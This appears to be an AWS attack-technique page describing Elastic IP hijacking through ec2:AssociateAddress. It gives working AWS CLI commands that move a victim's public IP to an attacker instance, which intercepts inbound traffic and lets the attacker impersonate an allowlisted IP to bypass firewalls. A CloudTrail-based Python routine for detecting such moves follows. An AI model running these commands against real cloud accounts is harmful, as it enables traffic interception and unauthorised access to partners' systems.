AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation
Summary
Abuse ec2:AssociateAddress (and optionally ec2:DisassociateAddress) to re-associate an Elastic IP (EIP) from a victim instance/ENI to an attacker instance/ENI. This redirects inbound traffic destined for the EIP to the attacker, and also lets the attacker originate outbound traffic from the allowlisted public IP in order to pass external partners' firewalls.
Prerequisites
- Target EIP allocation ID within the same account/VPC.
- An attacker instance/ENI that you control.
- Permissions:
  - ec2:DescribeAddresses
  - ec2:AssociateAddress on the EIP allocation-id and on the attacker instance/ENI
  - ec2:DisassociateAddress (optional). Note: --allow-reassociation will auto-disassociate from the previous attachment.
Attack
Variables
REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>
- Allocate or identify the victim's EIP (the lab allocates a new one and attaches it to the victim)
ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query 'Addresses[0].PublicIp' --output text)
- Verify that the EIP currently points to the victim's service (for example, check the banner)
curl -sS http://$EIP | grep -i victim
- Re-associate the EIP to the attacker (this automatically removes the association with the victim)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION
- Verify that the EIP now points to the attacker's service
sleep 5; curl -sS http://$EIP | grep -i attacker
Evidence (the association moved):
aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
--query 'Addresses[0].AssociationId' --output text
Impact
- Inbound impersonation: All traffic to the hijacked EIP is delivered to the attacker's instance/ENI.
- Outbound impersonation: The attacker can originate traffic that appears to come from the allowlisted public IP (useful for getting past IP filters of partners/external sources).
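For detection, the re-association described above leaves AssociateAddress (and, on the optional path, DisassociateAddress) records in CloudTrail. The following is an added example, not part of the original page: it replays such records and reports every EIP that ends up on a different instance/ENI. The function name find_eip_moves is hypothetical, the sample events and all IDs are constructed, and the record layout (requestParameters.allocationId, instanceId, networkInterfaceId, responseElements.associationId) is assumed to match what CloudTrail logs for these EC2 calls.

```python
# Constructed CloudTrail records, trimmed to the fields used; every ID and ARN is made up.
SAMPLE_EVENTS = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventName": "AssociateAddress",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/deploy"},
     "requestParameters": {"allocationId": "eipalloc-0aaa", "instanceId": "i-0web"},
     "responseElements": {"associationId": "eipassoc-0001"}},
    {"eventTime": "2024-05-01T10:05:00Z", "eventName": "AssociateAddress",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/deploy"},
     "requestParameters": {"allocationId": "eipalloc-0bbb", "instanceId": "i-0app1"},
     "responseElements": {"associationId": "eipassoc-0002"}},
    {"eventTime": "2024-05-02T09:00:00Z", "eventName": "DisassociateAddress",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/deploy"},
     "requestParameters": {"associationId": "eipassoc-0002"}, "responseElements": None},
    {"eventTime": "2024-05-02T09:01:00Z", "eventName": "AssociateAddress",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/deploy"},
     "requestParameters": {"allocationId": "eipalloc-0bbb", "instanceId": "i-0app2"},
     "responseElements": {"associationId": "eipassoc-0003"}},
    {"eventTime": "2024-05-03T02:14:00Z", "eventName": "AssociateAddress",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/ci-runner"},
     "requestParameters": {"allocationId": "eipalloc-0aaa", "instanceId": "i-0other",
                           "allowReassociation": True},
     "responseElements": {"associationId": "eipassoc-0004"}},
]


def find_eip_moves(events):
    """Report each AssociateAddress that moves an EIP; implicit=True: it was still attached."""
    state, assoc_to_alloc, findings = {}, {}, []   # state: allocationId -> [target, attached]
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        if ev.get("errorCode"):                    # denied or failed calls changed nothing
            continue
        req = ev.get("requestParameters") or {}
        resp = ev.get("responseElements") or {}
        if ev["eventName"] == "DisassociateAddress":
            alloc = assoc_to_alloc.pop(req.get("associationId"), None)
            if alloc in state:
                state[alloc][1] = False            # remember the last holder, mark detached
        elif ev["eventName"] == "AssociateAddress":
            alloc = req.get("allocationId")
            target = req.get("instanceId") or req.get("networkInterfaceId")
            prev = state.get(alloc)
            if prev and prev[0] != target:
                findings.append({"time": ev["eventTime"], "allocationId": alloc,
                                 "from": prev[0], "to": target, "implicit": prev[1],
                                 "actor": ev["userIdentity"]["arn"]})
            state[alloc] = [target, True]
            if resp.get("associationId"):
                assoc_to_alloc[resp["associationId"]] = alloc
    return findings
```

Findings with implicit set to True correspond to the --allow-reassociation path; compare the actor and the new target against the roles and instances expected to hold that allocation before alerting.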